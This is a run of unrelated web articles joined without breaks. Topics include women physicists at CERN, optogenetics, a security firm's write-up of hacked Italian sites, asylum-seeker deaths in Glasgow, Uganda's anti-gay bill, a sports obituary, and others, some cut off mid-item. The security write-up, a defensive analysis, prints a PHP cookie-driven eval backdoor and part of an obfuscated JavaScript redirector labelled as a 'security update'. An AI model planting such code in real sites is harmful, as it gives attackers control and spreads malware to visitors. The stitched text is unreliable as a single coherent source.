Photo courtesy of CERN Photolab .
In January when I went to visit physicists at CERN on the French - Swiss border just outside Geneva–one of the world ’s largest scientific research centers–my expectations were n’t very high .
“ Hard sciences ” such as physics , chemistry and math never really attracted me due to their predominantly male connotations .
I only knew vaguely what was going on at CERN ( the French acronym for Conseil Européen pour la Recherche Nucléaire , or European Organization for Nuclear Research ) –something about recreating the Big Bang , finding the one particle of matter that will confirm all theories of modern physics , and discovering what the universe is made of and how it works .
Little things like that .
I was mostly there to chaperone my significant other , who had made an animation for the organization and thus had been invited to a guided tour of its infamous premises , which include its large hadron collider–basically a huge circle - shaped underground tunnel in which atomic particles collide .
But what I discovered , to my delight , was not just men in white lab coats but feminist physicists dedicated to removing the “ male ” stamp on science and working hard to make it more attractive to young women and girls .
Our guide introduced me to physicist Pauline Gagnon , an active feminist and editor of the ATLAS - experiment newsletter .
Gagnon told me that among the 10,000 physicists active at CERN , 16 to 18 percent are women–an underrepresentation , certainly , but a great step forward from the numbers of women when the facility opened in the 1950s .
To celebrate that –and eventually raise those numbers –Gagnon has chosen to honor the women of CERN on this International Women ’s Day .
All control rooms and accelerators will primarily be staffed by women .
“ That means that on March 8th , the largest accelerator in the world and the more complex experiments will be operated mostly by women , ” she told me .
There will be a live webcam in each control room , and Fermilab– a major particle - physics lab located in the U.S. – will also join the event .
At CERN , each experiment group has also produced a special poster featuring the women involved , and they will be displayed both on site and on the website dedicated to the March 8th event .
Gagnon hopes that such actions and role modeling will lay down a welcome mat for girls interested in careers in physics and other “ hard science ” fields .
“ We want people to know that this is no longer an off - limit place for women , that there are already many women in the field and that things have changed immensely , ” she said .
“ Plus , it is terribly exciting work and we ’re having a lot of fun . ”
Hopefully efforts like these will encourage more girls to stop thinking as I once did that “ hard science ” is male .
Instead , they can start dreaming of becoming future physicists and Nobel Laureates .
Rap - physicist Alpinekat gives the lowdown on the large hadron collider
Read more on jobs and economic issues from Ms. here .
EACH NEW GENERATION of astronomers discovers that the universe is much bigger than their predecessors imagined .
The same is also true of brain complexity .
Every era ’s most advanced technologies , when applied to the study of the brain , keep uncovering more layers of nested complexity , like a set of never ending Russian dolls .
We now know that there are up to 1,000 different subtypes of nerve cells and supporting actors — the glia and astrocytes — within the nervous system .
Each cell type is defined by its chemical constituents , neuronal morphology , synaptic architecture and input - output processing .
Different cell types are wired up in specific ways .
For example , a deep layer 5 pyramidal neuron might snake its gossamer - thin output wire , the axon , to a subcortical target area while also extending a connection to an inhibitory local neuron .
Understanding how the brain ’s corticothalamic complex creates any one conscious sensation necessitates delineating these underlying circuits for the 100 billion cells in the brain .
Bulk tissue technologies such as functional brain imaging or electroencephalography identify specific brain regions related to vision , pain or memory .
Yet they are unable to resolve details at the all - important circuit level .
Brain imaging tracks the power consumption of a million neurons , irrespective of whether they are excitatory or inhibitory , project locally or globally , and so on .
For progress on consciousness , something drastically more refined is needed .
Furthermore , as our understanding of the brain grows , our desire to intervene , to help ameliorate the many pathologies to which the mind is prey , grows commensurately .
Yet today ’s tools ( drugs and deep - brain stimulations ) are comparatively crude , with undesirable side effects .
To the rescue rides an amazing technology , a fusion of molecular biology with optical stimulation , dubbed optogenetics .
It is based on some fundamental discoveries made by three German biophysicists — Peter Hegemann , Ernst Bamberg and Georg Nagel working on photoreceptors in ancient bacteria .
These photoreceptors directly ( rather than indirectly , like the ones in your eyes ) convert incoming light in the blue part of the spectrum into an excitatory , positive electrical signal .
The trio also isolated the gene for this protein , called channelrhodopsin - 2 ( ChR2 ) .
Bamberg and Nagel subsequently engaged in a fruitful collaboration with Karl Deisseroth , a professor of psychiatry and bioengineering at Stanford University , and Edward S. Boyden , now at the Massachusetts Institute of Technology .
The group took the ChR2 gene , inserted it into a small virus , and infected neurons with this virus .
Many of the neurons took up the foreign instructions , synthesized ChR2 protein and inserted the photoreceptors in their membrane .
In the dark , the receptors quietly sit there , with no discernible effect on their host cells .
But illumination of the network with a brief flash ( 10 milliseconds ) of blue light causes each of these bacterial photoreceptors to jolt their host cell a bit .
Collectively , they reliably and repeatedly produce a spike in the membrane voltage .
Spikes are the universal all - or - none pulses used by all but the tiniest nervous systems to communicate information among neurons .
Each time the light is turned on , the cells spike reliably , exactly once .
Thus , an entire population of neurons can be manipulated by precisely timed stabs of light .
The biophysicists added another photoreceptor to their tool kit .
It derives from a different type of bacterium , one living in dry salt lakes in the Sahara Desert .
Shining yellow light on it yields an inhibitory , negative signal .
Through the same viral strategy , both photoreceptor types were then introduced into neurons .
Once the neuron stably incorporates both types into its membrane , it can be excited by blue light and subdued by yellow .
Each blue flash evokes a spike , like a note sounding when a piano key is pushed down .
But a simultaneous flash of yellow light can block that spike .
Consider the “ musical score sheet ” recorded from one such neuron as it is played with light .
This ability to precisely control electrical activity in one or more neurons is unprecedented .
But the benefits of this technology for discerning the circuits of the mind go much deeper , because the virus that carries the photoreceptor genes can also carry promoter sequences that express their payload only in neurons with the appropriate molecular address .
So rather than exciting all the neurons in a particular neighborhood , it becomes feasible to focus on a subset that synthesize a particular neurotransmitter or that send their outputs to a specific place .
Deisseroth ’s group exploited this capability by introducing ChR2 into a subset of neurons located in the lateral hypothalamus , deep inside the mouse brain .
Here about 750 cells produce orexin ( also known as hypocretin ) , a hormone that promotes wakefulness .
Mutations in the orexin receptors are associated with narcolepsy , a chronic sleep disorder .
As a result of the manipulation , almost all the orexin neurons , but none of the other intermingled neurons , carried ChR2 photoreceptors .
Furthermore , blue light via an optical fiber precisely and reliably generated waves of spikes in the orexin cells .
What would happen if this experiment were done in a sleeping mouse ?
In control animals , a couple of hundred blue flashes awakened the rodents after about one minute .
When the same light was delivered to animals carrying the ChR2 gene , they woke up in half the time .
That is , ghostly blue light that illuminates the catacombs of the brain and causes a tiny subset of neurons with a known identity to produce electrical spikes wakes up the animal .
With additional controls , the Stanford group proved that the release of orexin from the lateral hypothalamus was what drove this behavior .
This exemplary study established a compelling causal link between electrical activity in a subset of the brain ’s neurons and sleep - to - wake transitions .
A string of such beautiful , interventionist mice experiments over the past several years has revealed specific circuit elements involved in a variety of normal and pathological behaviors : depression , behavioral conditioning , Parkinson ’s disease and cortical oscillations critical for attention , among others .
They have even helped restore sight to mice blinded by degenerating retinas .
ChR2 experiments have been carried out successfully in monkeys ; experimental human trials for some psychiatric illnesses are being actively considered .
The import of optogenetics for consciousness is that it allows testing of a specific hypothesis about the neural basis of consciousness .
For instance , to what extent is feedback from higher cortical regions to lower regions essential ?
Find out by training an animal in a task that depends on conscious sensation , then inactivate those circuit elements with light and observe the animal ’s behavior .
Francis Crick , co-discoverer of the double helical structure of DNA , and I had hypothesized that the claustrum , a mysterious thin structure located below much of cortex , is critical for binding information across sensory modalities and making it accessible to consciousness .
The challenge is to find an appropriate behavior that requires mice to combine information dynamically across modalities — say , touch and smell .
Then excite or inhibit claustrum neurons while the animals execute the task to study the extent the structure is necessary for this behavior .
A judicious mix of recombinant DNA technology , protein and viral design , genomics , optical fibers , lasers and microinstrumentation will enable scientists to explore strange new theories that close the gap between the objective brain and the subjective mind , to boldly go where no one has gone before .
0 SHARES Facebook Twitter
On the last few days we are seeing a large number of reports from Italian sites getting hacked .
Way more than the average and way more than from any other country .
We got a chance to analyze a couple of them and they all look very much the same .
What is interesting is that we are seeing a wide range of sites , from WordPress blogs , to Joomla - based ones and even simple HTML - only sites .
Plus , they are hosted on a large variety of hosting companies , ruling out a shared - server compromise .
Analysis of the attack
All the sites we analyzed followed a similar pattern .
First , a script mailcheck .php was added to the root directory of the site :
< ?php eval ( base64_decode ( 'aWYoaXNzZXQoJF9DT09LSUVbIl9kZSgk.. ' ) ) ;
echo “ checking email … ” ; ?>
If you decode this script by changing the “ eval ” for “ echo ” , you can see what is it doing :
$ php mailcheck .
php
if ( isset ($_COOKIE [ “ PHPSESSIID ” ] ) ) {eval ( base64_decode ($ _COOKIE
[ “ PHPSESSIID ” ] ) ) ; exit ; }checking email …
So the mailcheck .
php is a backdoor that executes whatever command the attacker is giving .
Also , at the top of any index file they added the following :
< ?php ob_start ( ' security_update ' ) ; function security_update ( $ buffer ) {return $ buffer . '< script
language= ” javascript ” > function t( ) {return z( $a ) ; }var $ a=” Z64aZ3dZ22fqb0t -
7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~
tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3e
..
;}//important security update ?>
They try to hide what they are doing with a “ security_update ” string at the start of it and an “ important security update ” comment at the end .
Very clever …
In fact , one of our clients saw that and did n’t want to remove the code because he thought it was indeed an important update .
What this code does is just a malicious javascript that redirects and loads malware from a couple of other sites .
This is what it looks like when I change the “ eval ” for “ alert ” :
Here is the code a bit more organized :
Are you seeing issues like that on your site ?
If you are infected try removing those files and looking for strange entries on your index files .
Also , my recommendation is that you revert back to a previous ( and clean ) backup or do a full scan on all your site to make sure there is nothing hidden in there .
As always , you can contact us for help .
Want to read more stories like this one ?
Follow @sucuri_security on twitter or subscribe to our RSS feed .
Interested in a web site security monitoring solution ?
Visit sucuri.net .
Microsoft looks to Internet Explorer 9 to help it retain the lead in browsers , and possibly increase market share .
But maybe it's time for Microsoft to try something far more radical : Make Internet Explorer open source .
Microsoft is betting that IE 9's increased speed and better adherence to HTML 5 standards will stem the erosion of IE 's market share .
I 'm not sure that 's enough , though .
Firefox and Chrome are gaining on IE at least in part because of the vibrant ecosystem of developers who write add-ins for those browsers .
Making IE open source could help quickly build a similar ecosystem for IE , and help fend off Firefox and Chrome .
In addition , if Microsoft made IE open source , it could take some of the ideas that developers come up with for the browser itself , and incorporate them into its version of the browser .
Better ideas are at a premium ; this would be a cheap way to get them .
Making IE open source would not lead to any revenue loss for Microsoft , because IE is free , and so not a revenue generator .
Even though IE does n't generate revenue , it 's still important to Microsoft for a variety of reasons , including helping build market share for Bing .
But it 's not as if Microsoft needs to publicize IE ; anyone who uses Windows already has the browser on his PC .
And making IE open source could potentially help Bing , because some developers might leave Bing as the default search engine if they build their own IE versions .
Turning IE into open source software , of course , is antithetical to just about everything that Microsoft stands for .
That , in itself , may be reason enough to give it a try --- it 's been a long time since Microsoft was seen as an market - leading innovator , and doing it would certainly go a long way towards helping re-establish that image
This story , " Why Microsoft Should Make IE Open Source " was originally published by Computerworld .
By any measure , the Red Road estate in north Glasgow is a grim place to die .
Dilapidated doorways and rust - stained windows dominate the eight high - rise blocks , which tower over the city .
To locals , they are known as a home for the unwanted and those whose futures lie in the hands of Home Office officials .
It was here , early on Sunday morning , that a family of Russian asylum seekers chose to end their lives by jumping from the 15th floor of one of the buildings .
Neighbours say the family were about to be removed from the country .
Yesterday , three patches of upturned earth and a bunch of flowers marked where their bodies landed .
Nearby , pieces of paper weighed down with pebbles bore messages , some written in Sanskrit , which read : " Freedom .
You died for freedom " .
The bodies of two men and a woman – believed to be a mother , father and son – were discovered lying at the bottom of the 31 - storey high - rise known as Block 63 at 8.45 am on Sunday morning .
A smashed cupboard was found beside them , which they appeared to have thrown from the balcony to break its protective netting before jumping 150 ft to their deaths .
Although their identities have yet to be confirmed , they are believed to be Russian nationals whose applications to remain in the UK had recently been rejected by the Home Office .
Several witnesses said at least two of the three were tied together when they jumped .
Police said their deaths were not being treated as suspicious .
The family are understood to have been granted asylum in Canada but had left for Britain in 2007 after a dispute with the Canadian authorities .
They had been asked to leave their flat in Springburn after their application to stay was refused , though no removal order had been issued .
Last night the Home Office denied there had been any UK Border Agency activity at the property on Sunday morning .
The Glasgow North East Labour MP Willie Bain said : " Although the victims of this tragic incident have not been named , I believe I know who they are and had been assisting in their case .
It is my understanding that no removal order had been served , but that if one had been , they would have been removed to Canada because that is the country where they were living lawfully before travelling to the UK . "
" This place was silent on Sunday , " said Farideh Pardak , an Iranian woman who has lived on the 24th floor of the building for three years .
" Everyone was very afraid because we knew it could have been any one of us that had lost hope .
When I saw the three of them on the grass after they had fallen , they looked like they were sleeping .
It 's very sad .
We cared for these people – they were one of us . "
An Iranian asylum seeker , who lived close to the family in Block 63 but would only give his name as Mohsen , said he had spoken to the woman last week , when she told him the Home Office had decided to deport them .
" When I met her she was n't herself , " he said .
" She seemed very upset and under pressure , as if she could n't bear it .
She said they were struggling with the deportation , they were upset and angry .
When I saw what had happened on Sunday morning I could n't believe it .
The Home Office are keeping people like animals in here . "
The Red Road complex , which was built in the 1960s but is now due for demolition , is viewed locally as a modern refugee ghetto due to the high numbers of asylum seekers from Kosovo , Africa , Asia , Russia , Iran and Iraq living there .
Residents whose asylum applications fail usually receive a knock on their door from UK Border Agency officials early in the morning , and are taken to the immigration removal centre , Dungavel House .
They are then flown back to their native country .
" The flats have got a reputation in Glasgow for being a really horrible place to live , " said Mandy Todd , a voluntary worker at Unity Centre Glasgow , which offers help to asylum seekers living in the flats .
" About eight years ago they started clearing out the residents and putting in asylum seekers .
The flats are up for demolition at the moment ...
It 's quite common for old housing stock that 's set for demolition to be cleared out and asylum seekers temporarily housed there .
" Asylum seekers have no say over where they get sent to when they make their claim – there are areas in places like Glasgow or Newcastle where they are just bunged with the rest of their community . "
Positive Action in Housing , a charity which supports refugees , said it currently had records of five families living in Block 63 who were facing imminent deportation .
" The state of the flats is appalling , " said the charity 's director Robina Qureshi .
" They 're damp , run-down , awful places to live in – they 're depression hell - holes .
" We have so many families in that area who have come into our offices crying and telling us they 're thinking of ending it all .
This case raises serious questions about the way the UK asylum system operates .
Members of the public have a right to know if we have a fair asylum system , or one which terrorises vulnerable people to the point they would kill themselves . "
Another asylum seeker , from the Republic of Guinea , who did not wish to be named for fear of jeopardising his Home Office case , said : " 99 per cent of people here live in fear of being deported .
Every day the threat is here because the Home Office are bullies – they treat us like animals .
They build up hope but then just tell you lies .
These people , they knew that if they are going to be sent home then they face being thrown in prison where they will be tortured or starved on one meal a day .
They know they are going to die over a long time , maybe months or years , so they take a shortcut and kill themselves here quickly . "
Cynthia Ayorinde , from Nigeria , has been in the UK for six years and has lived in the Red Road flats with her two children for the past six months .
" I have thought about taking my life and my children 's lives , " she said .
" We share flats with drug addicts .
" My family and I spent two months in the Dungavel detention centre in July , but now , because I can't take living like this any longer , I have applied for assistance to go home to my country .
I know it is a huge risk but I can't stay here , waiting until we lose hope . "
Uganda has indicated it will bow to international pressure and amend draconian anti-homosexual legislation that includes the death penalty for HIV - positive people convicted of having gay sex .
Breaking his silence on the controversial bill – which was put forward by a member of the ruling party – Uganda 's president , Yoweri Museveni , said it had become a " foreign policy issue " and needed further consultation before being voted on in parliament .
The proposed law , which has been pushed by local evangelical preachers and vocally supported by senior government officials , also threatens life imprisonment for anyone convicted of gay sex .
While broadly supported domestically , the legislation has caused a storm of protest abroad and consternation from western donors who fund a large chunk of Uganda 's budget .
Addressing a party conference , Museveni said numerous western leaders had spoken to him about the bill .
" When I was at the Commonwealth conference , what was [ the Canadian prime minister , Stephen Harper ] talking about ?
The gays .
UK prime minister Gordon Brown ... what was he talking about ?
The gays , " said Museveni .
The US secretary of state , Hillary Clinton , had also called him to express strong concerns about the proposed law , he said .
" It 's a foreign policy issue , and we must handle it in a way that does not compromise our principles but also takes into account our foreign policy interests . "
Museveni said the proposed law did not necessarily reflect party or government policy and his cabinet would discuss the bill with David Bahati , the MP who introduced it , before it was put to a vote .
Homosexuality is already outlawed in Uganda under colonial - era legislation .
Such is the stigma attached to gay people that no public figure has ever come out .
But in recent years some religious leaders have been warning that tougher measures are needed to prevent an increase in same - sex relationships .
Accusations that gay Europeans are offering money to " recruit " Ugandan schoolchildren – a claim repeated by Museveni during his party speech on Tuesday – also seem to have raised the level of homophobia in the country .
The final impetus for the proposed legislation came after a conference hosted last year by three controversial US evangelists who claimed that homosexuality was a curable habit and warned of the danger of the international gay " agenda " .
The evangelists have since , however , criticised the severity of the punishments in the proposed law .
Under Bahati's bill , " serial offenders " would join HIV - positive people and those who have sex with under - 18s in facing the death penalty if convicted of gay sex .
Life imprisonment would apply to those found guilty even of touching someone from the same sex " with the intention of committing the act of homosexuality " .
Members of the public would have to report any homosexual activity to police within 24 hours or face up to three years in jail , a provision the bill 's opponents say would lead to a witchhunt .
Ugandans living abroad who broke the law could be extradited and punished , under the draft bill .
Before the legislation was introduced to parliament in September , local gay support organisations , whose members already face harassment , threats and workplace intimidation , have been lobbying the government to amend the country 's HIV awareness and prevention programmes , which currently exclude homosexuals .
But instead of achieving their aims these gay groups would be banned under the new law .
James Nsaba Buturo , minister of state for ethics and integrity , who is a strong supporter of the bill , said before Museveni 's speech that it was likely that the death penalty provisions would be dropped because of the international outcry .
But Frank Mugisha , chair of Sexual Minorities Uganda , a Kampala - based coalition of lesbian , gay , bisexual , transgender and intersex groups , said that even if this happened the bill would have " a lot of discrimination in it .
" He [ Museveni ] seems to be saying that the law should be watered down due to foreign interests .
But he should rather be talking about the interests of minorities in Uganda .
He should come out and say that the entire bill is just wasting time . "
The latest smartphone subscriber numbers are out , and the last three months have been kind to Google .
Android 's still a relatively small player , but its usage base more than doubled since October .
The iPhone , meanwhile , keeps on treading water .
Advertisement
RIM remains the leader in the smartphone space , with nearly half the market using BlackBerries .
Apple 's 25.1 % share is undeniably impressive , but only growing .3 percentage points ( relative to the market ) means this summer 's impending iPhone 4 release can't come soon enough for Cupertino .
Either that or a whole mess of patent lawsuit wins .
The Complete iPhone v.4 Rumor Roundup Yes , the Apple Tablet is coming next week !
But do you know what gets me even more excited ?
A new … Read more
Advertisement
The losers , predictably : Palm , whose business model is collapsing before our eyes , and Microsoft , whose sitting duck WinMo 6.5 OS is in the process of being totally scrapped .
The Indie Phone Maker 's Last Stand The Palm Pre unveiling stands in my memory as one of the most refreshing moments in modern history .
Read more
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
[ ComScore via TechCrunch ]
I am going to tell a story just to give an understanding of the real value of FOSS in business .
I recently developed an SMS ( Short Message Service ) daemon for a project at work .
The daemon is using the SMPP protocol to send messages .
To save time ( and money ) I used an Open Source SMPP library ( from Logica ) instead of implementing the protocol myself .
I tested it on a dummy SMPP server and everything worked just fine but when I tried it on the real server the daemon started behaving unexpectedly .
After spending some time troubleshooting I figured it out .
The problem was that the SMPP Server of my provider was sending multiform packages in some cases .
The problematic package was send only when the daemon exceeded the maximum number of SMS per second .
The submit response that the server was sending did not have a message
Id ( the field was missing ) , while it was suppose to respond with a blank message
Id in case of an error , as the SMPP specifications require .
The SMPP library was handling it transparently by reporting the error back to the server .
I contacted my provider to report the bug but unfortunately they could do nothing about it .
Not soon enough at least .
So it was up to me to fix the problem .
Luckily the particular library is very well written so I was able to modify it in order to handle the malformed package .
But what would happen if I did not have access to the source code ?
I would be stuck .
Clearly the problem was not with the library and the vendor would have refused to make any changes as the library did not have any problems .
Even if the vendor agreed to make the changes it would have been at a very high price .
My provider would not fix the problem for years to come and changing my provider is not an option .
The bottom line is that FLOSS is not about cheap software .
It ’s about control .
If you have the source code then you are in control of the situation , although good support from the vendor is always welcomed .
Cheap price comes with the openest / freedom , since you are not restricted to pay support to a particular vendor if you are not happy with him .
P.S. : Some claim that Free Software is not the American way .
They say it might hurt big software companies or prevent small ones from success .
If the American way is the way of the American Revolution , then it ’s about people seeking their freedom .
Tolerating the artificial restriction of your freedom from someone who ’s only purpose is making profit , is not the American way .
Having this in mind , FOSS is as American as Software gets .
Last Easter , Jamie Paulin - Ramirez , a 31 - year - old mom with a $ 30,000 - a- year job as a medical assistant , announced to her family that she had converted to Islam .
A few months later , she began posting to Facebook forums whose headings included " STOP caLLing MUSLIMS TERRORISTS ! "
On Sept. 11 , she suddenly left Leadville , Colo. , a small town in ...
Complaints about a new religious ad campaign on TTC vehicles have prompted a review .
Launched on March 18 , the campaign by Bus Stop Bible Studies is meant to get people to “ consider their relationship with God , ” says founder David Harrison .
The posters , featured on the exterior of buses and streetcars , pose 24 questions , including “ What is hell ? ” and “ God , is 2012 the end ? ”
Each question is followed by the address of a website where the topic at hand is discussed .
The one that ’s drawing ire is “ Does God care if I ’m gay ? ”
The photo of a tattooed young man directs transit riders to the page www.answerme.ca/doesgodcare.
The long answer to the question reads , in part , “ We know from passages throughout Scripture that God hates homosexual acts BUT no more than any other sinful act . ”
By Wednesday night , the answer on that site had been removed .
“ It has become apparent that , while one is free to ask the question , ` Does God care if I ’m gay ? ’ one is not so free to answer the question from a Biblical perspective , ” the edited site .
“ It seems that the whole message of God ’s justice and grace was being misinterpreted .
If anyone was offended by the original narrative we offer our sincerest apologies , this was never the intent . "
Before it was removed , the answer to the question read , in part : “ We know ....
TTC spokesperson Brad Ross said he did n’t know how many complaints had come in , but he did say that after five objections , the commission ’s ad committee undertakes a review .
The Ontario Human Rights
Code obliges the TTC to accept ads from religious organizations , he added .
Harrison , who said he attends a Brethren church in the city , said reaction to the ad has been “ blown out of proportion . ”
“ I do n’t think the Bible even teaches that homosexuality is a sin , ” he said .
“ The Bible does teach that any sexual act outside of marriage , straight or homosexual , is a sin . ”
When asked about gays and lesbians who have had legal same - sex marriages in Canada , Harrison said “ Who made same - sex marriage legal ?
God or man ? ”
“ The fact that it ’s legal does n’t mean in God ’s sight it ’s right . ”
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Bus Stop Bible Studies has been running ads on the TTC since 2006 , as well as on public transit in Burlington , North Bay , Sudbury and Calgary .
A registered charity , it funds its campaigns through donations .
Last year , the Canadian Atheist Bus Campaign ran an ad on the TTC that read “ There ’s probably no God .
Now stop worrying and enjoy your life . ”
After a similar complaints and review process , the TTC decided to let the ad keep running .
Ross said he does n’t know when the decision whether or not to pull the ad by Bus Stop Bible Studies will be made .
SALT LAKE CITY -- Merlin Olsen , a Hall of Fame defensive lineman and member of the Los Angeles Rams ' " Fearsome Foursome " who followed up football with a successful television career in " Little House on the Prairie , " NFL broadcasts and commercials , has died .
He was 69 .
Utah State , Olsen 's alma mater , said he died outside of Los Angeles early Thursday after battling cancer .
He was diagnosed with mesothelioma , a cancer of the lung lining , last year .
" He was ferocious and fearless on the football field and then the other probably more important aspect of his personality was he was a true gentleman , " said fellow Hall of Famer Jack Youngblood , his teammate with the Rams in Los Angeles .
" We all know what a wonderful , tremendous football player he was , but he was so much more than that . "
NFL commissioner Roger Goodell issued a statement lauding Olsen as an " extraordinary person , friend and football player . "
" He cared deeply about people , especially those that shared the game of football with him , " Goodell said .
" Merlin was a larger - than - life person , literally and figuratively , and leaves an enormously positive legacy . "
Olsen was a consensus All - American at Utah State and a first - round draft pick of the Los Angles Rams in 1962 .
The giant from northern Utah joined Deacon Jones , Lamar Lundy and Rosey Grier on the Rams ' storied " Fearsome Foursome " defensive line known for either stopping or knocking backward whatever offenses it faced .
The Rams set an NFL record for the fewest yards allowed during a 14 - game season in 1968 .
Olsen was rookie of the year for the Rams in 1962 and is still the Rams ' all - time leader in career tackles with 915 .
He was named to 14 consecutive Pro Bowls , a string that started his rookie year .
Olsen was also an established television actor with a role on " Little House on the Prairie , " then starring in his own series , " Father Murphy , " from 1981 to 1983 and the short - lived " Aaron 's Way " in 1988 .
As a Utah State senior , Olsen won the 1961 Outland Trophy as the nation 's best interior lineman .
The Rams drafted him third overall in 1962 and he spent the next 15 years with the team before retiring in 1976 .
His Pro Football Hall of Fame induction came in 1982 .
" We are deeply saddened to learn of Merlin 's passing .
He was not only an extraordinary football player but just a superb human being , " Hall of Fame president / executive director Steve Perry said in a statement .
" He was a dear friend to all of us at the Hall of Fame and to all of his fellow Hall of Famers .
His support of the Hall over the years , including his past five as a member of our board , will long be appreciated . "
Utah State honored Olsen in December by naming the football field at Romney Stadium " Merlin Olsen Field . "
Because of his illness , Olsen 's alma mater did n't want to wait until football season and made the announcement during halftime of a basketball game .
Olsen was well enough to attend , but did not speak at the event .
He stood and smiled as he waved to fans during a standing ovation and chants of " Merlin Olsen ! " and " Aggie Legend ! "
Utah State is also planning a statue of Olsen at the southeast corner of the stadium .
" This was the voice of a man who not only became one of our country 's most decorated athletes , but also one of the most accomplished and respected people ever to hail from the state of Utah , " said Stan Albrecht , president of Utah State .
The Rams also honored Olsen during a game Dec. 20 , with a video tribute narrated by Dick Enberg , Olsen 's longtime broadcast partner .
Olsen did not attend because of his health .
His name was already part of the Ring of Fame inside the Edward Jones Dome in St. Louis along with other franchise standouts .
He was voted NFC defensive lineman of the year in 1973 and the NFL MVP in 1974 , and was voted to the Pro Football Hall of Fame in 1982 .
Information from The Associated Press was used in this report .
The controllers are light .
Much more akin to the DualShock3 than the Wiimote in heft , and we 're guessing that 's due to Sony 's continued love of rechargeable batteries .
The main controller does have some subtle vibration ( not DualShock or Wiimote level , but present ) , but we 're not sure yet about the subcontroller .
We hate to say this about " pre-alpha " software , but we 're feeling lag .
An on - rails shooter we tried out , dubbed The Shoot , was discernibly inferior to shooting experiences we 've had on the Wii , both in precision and refresh rate of the aiming cursor .
The gladiator game is about as fun as it looks , we 'll have video after the break momentarily .
Unfortunately , while it 's less of a defined experience than something like the sword game on Wii Sports Resort , you 're still working through a library of sensed , pre-defined actions instead of a true 1:1 fighting game with simulated physics .
Not that it is n't possible with PlayStation Move , just that it 's not this .
The lightness of the controllers means we might be feeling less of that Wiimote fatigue , always a good thing !
There 's an aspect of the controller that feels a little cheap , but at the same time we would n't call it fragile .
As far as we can tell , the control scheme for Socom 4 is quite similar to dual - controller shooter setups on the Wii , with the camera moving based on your aiming cursor hitting the edge .
It 's hard to see this as the preferred hardcore setup , but we 're told it 's configurable , so we 'll try and see what else is on offer .
The system seemed to have a bit of trouble understanding the configuration of our body in a swordfighting stance : even though we selected " left handed , " it was putting our sword arm forward instead of our shield .
Right - handers did n't seem to have similar problems , and we 're sure this will be ironed out in time , but it certainly shows that the controllers are n't magical in their space - detection prowess .
As would be expected , you 're supposed to stand relatively center on the TV , and at a certain optimal distance .
The system is forgiving , but there 's a sweet spot that users will undoubtedly have to learn .
Lag is less prominent on Socom 4 , and we'd say we 're pretty accurate with the controller already , though the framerate choppiness of this pre-alpha build obviously hampers that a bit .
We did get a slight feel of being in " scene to scene " shootouts instead of a free - roaming FPS , perhaps a design choice to mitigate the limited camera movement offered by the controller , but we 'll have to see more levels to know for sure .
At last , we 've felt Sony 's long awaited motion controller , now at last officially known as " PlayStation Move , " in our unworthy , sweaty hands .
We have a bunch of videos on the way , but for now you can revel in our first close - ups of the controllers in the gallery below .
Here are some of our initial thoughts :
We added in a longer video -- are you ready for three minutes of nonstop excitement ?
We 've got a new video with close - up walkthroughs of the controllers and some in - depth gameplay of Socom 4 .
If you were raped :
Protect Yourself Against Rape :
Watch your drink :
Watch out for each other :
If you start to feel sick or strange , tell a friend immediately !
Date rape drugs can take effect in as little as 15 minutes .
Trust your instincts !
If you feel something is wrong , it probably is .
Do n't be afraid to make a scene and stand up for yourself .
This could be the difference between life and death .
If you have any questions about sexual assault or need to talk about what has happened to you or a friend , call our 24 - hour crisis line at ( 812 ) 336-0846 .
Child Sexual Abuse ~ Disclosures
Among victims of sexual abuse , the inability to trust is pronounced , which also contributes to secrecy and non-disclosure .
Children often fail to report because of the fear that disclosure will bring consequences even worse than being victimized again .
The victim may fear consequences from the family , feel guilty for consequences to the perpetrator , and may fear subsequent retaliatory actions from the perpetrator .
Victims may be embarrassed or reluctant to answer questions about the sexual activity .
Victims may also have a feeling that " something is wrong with me , " and that the abuse is their fault .
In addition to " sexual guilt , " there are several other types of guilt associated with the abuse , which include feeling different from peers , harboring vengeful and angry feelings toward both parents , feeling responsible for the abuse , feeling guilty about reporting the abuse , and bringing disloyalty and disruption to the family .
Any of these feelings of guilt could outweigh the decision of the victim to report , the result of which is the secret may remain intact and undisclosed .
A child 's initial denial of sexual abuse should not be the sole basis of reassurance that abuse did not occur .
Virtually all investigative protocols are designed to respond to only those children who have disclosed .
Policies and procedures that are geared only to those children who have disclosed fail to recognize the needs of the majority of victims .
Study of 630 cases of alleged sexual abuse of children from 1985 through 1989 : Using a subset of 116 confirmed cases , findings indicated that 79 percent of the children of the study initially denied abuse or were tentative in disclosing .
Of those who did disclose , approximately three - quarters disclosed accidentally .
Additionally , of those who did disclose , 22 percent eventually recanted their statements .
Young victims may not recognize their victimization as sexual abuse .
There is the clinical assumption that children who feel compelled to keep sexual abuse a secret suffer greater psychic distress than victims who disclose the secret and receive assistance and support .
Early identification of sexual abuse victims appears to be crucial to the reduction of suffering of abused youth and to the establishment of support systems for assistance in pursuing appropriate psychological development and healthier adult functioning .
As long as disclosure continues to be a problem for young victims , then fear , suffering , and psychological distress will , like the secret , remain with the victim .
===========================================
Former legislator Juanita Goggins freezes to death in South Carolina home
By Hiram Lee
16 March 2010
The body of 75 - year - old Juanita Goggins , who in 1974 became the first black woman elected to the state government of South Carolina , was found in her home on March 3 .
Goggins , who is believed to have been suffering from Alzheimer ’s or another form of dementia , had been living with no heat or running water and is believed to have frozen to death on or around February 20 .
While Goggins does not appear to have been without money , her utility bills went unpaid and , in the middle of an especially harsh cold snap in which temperatures dropped below freezing , her electricity was cut off by her utility company .
She died alone , wearing several layers of clothing in an effort to keep warm .
At least 11 days passed before her body was discovered .
Along with having been the first black woman elected to the South Carolina general assembly , Goggins , a lifelong liberal Democrat , was also the first black woman to serve on the US Civil Rights Commission .
Goggins is well remembered in South Carolina for her focus on education and health care during her time as a legislator .
She fought to reduce the student - teacher ratios of overcrowded classrooms and led the way in establishing funding for sickle - cell anemia testing in the state .
Prior to her time as a legislator , Goggins had been a home economics teacher in South Carolina ’s segregated school system .
She retired from the state legislature in 1978 for health reasons that remain somewhat vague .
Sometime in the early 1990s , she divorced and moved to a small home in Columbia , the state capital , just miles from the statehouse building in which she had served .
She lived there for the remainder of her life .
Suggesting she was suffering from a considerable mental illness , Goggins lived an increasingly reclusive lifestyle , rarely leaving her home and almost never allowing anyone to enter .
